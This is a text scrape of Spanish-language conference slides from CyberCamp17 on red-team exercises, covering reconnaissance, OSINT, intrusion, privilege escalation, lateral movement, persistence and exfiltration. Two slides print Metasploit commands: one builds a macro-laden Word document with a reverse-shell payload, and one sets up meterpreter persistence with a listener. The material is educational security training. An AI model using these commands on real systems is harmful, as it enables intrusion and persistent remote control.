Documentos de Académico
Documentos de Profesional
Documentos de Cultura
en otra dimensión
0
Alejandro Ramos
*
@aramosf
*
#CyberCamp17
Agenda
*
§ Tests de intrusión.
§ Introducción al Red team
0
§ Fases de un Red Team
2
Test de intrusión
7
El adversario ha cambiado.
*
8
Red Team.
*
10
Blue Team.
-Microsoft
Objetivo medible mediante:
• Tiempo medio de detección - Mean-Time to Detect (MTTD)
• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)
13
Escenarios.
*
Fase creativa del ataque dónde se identifican
0
los ataques más probables (y realistas):
0
15
Reconocimiento inicial
*
16
Reconocimiento inicial - 2
*
17
Identificación.
*
Consiste en inventariar y conocer el objetivo al
0
máximo posible para elaborar el ataque y definir
18
Identificación.
Mediante técnicas OSINT
Referencias:
§ Awesome OSINT List:
https://github.com/jivoi/aweso
me-osint
§ OSINTFramework:
http://osintframework.com/
19
Ejempplo Identificación. Sublist3r
*
20
Ejemplo Identificación. Spiderfoot
*
21
Intrusión
*
22
Intrusión.
*
§ Spear Phishing.
*
§ Watering hole.
§ Vulnerabilidades.
*
§ Conocidas
§ 0days
§ Física
§ […]
23
Intrusión
*
24
Ejemplo Intrusión. Java/Macro.
§ Macro Office
§ msfconsole –x ‘use
exploit/multi/fileformat/office_word_macro; set
payload windows/shell/reverse_tcp; set filename
test.docm; set body Hola; set lhost
192.168.76.157; set lport 4444; exploit –y’
§ msfconsole –x ‘use multi/handler; set lport
4444; run’
25
Establecer repositorio.
*
26
Escalar privilegios.
29
Ejemplo: Servicios sin comillas.
32
Reconocimiento interno.
*
§ ¿Hay DHCP?
§ ¿Cuál es el direccionamiento ÎP de la red?
§ ¿DNS y puerta de enlace?
§ ¿Tenemos privilegios en el sistema local?
§ ¿Hay Antivirus?
§ ¿La red está segmentada?
§ ¿Dirección del proxy o método para salir a Internet?
*
§ ¿Wireless?
§ ¿Impresoras en red?
§ ¿Teléfonos VoIP?
33
Movimiento lateral
*
34
Movimiento lateral.
Se realiza mediante:
§ Ataques de red – MiTM
§ Reutilización de contraseñas –PtH
§ Otras vulnerabilidades en otros sistemas
§ Errores de configuración.
35
Movimiento lateral. Ejemplo
AD
Srv. de Srv de
Antivirus impresoras
36
Ejemplo de movimiento lateral. Salto de redes.
*
Linux Windows 7
Interfaz 2
10.0.2.6
Interfaz 1
10.0.2.5 Interfaz 1
192.168.1.195
Interfaz 1
192.168.1.209
Kali
37
Ejemplo movimiento lateral. Pivoting
38
Ejemplo movimiento lateral. PtH
*
39
Mantener persistencia
*
40
Ejemplo de persistencia.
*
§ use exploit/windows/local/persistence
§ set payload windows/meterpreter/reverse_tcp
§ set STARTUP SYSTEM
§ set SESSION 1
§ set LHOST 192.168.1.32
§ set LPORT 5554
Una vez Instalada, se abre un socket.
§ run
§ back
§ use exploit/multi/handler
§ set LPORT 5554
§ run
41
Exfiltración.
42
Videos y enlaces de referencia.
§ Alex Stamos
§ https://www.youtube.com/watch?v=NB4fPiCc-jc
§ Rob Joyce
§ https://www.youtube.com/watch?v=bDJb8WOJYdA
§ Bruce Schneider
§ https://www.youtube.com/watch?v=ktpSi908kjk
43
Gracias por su atención
0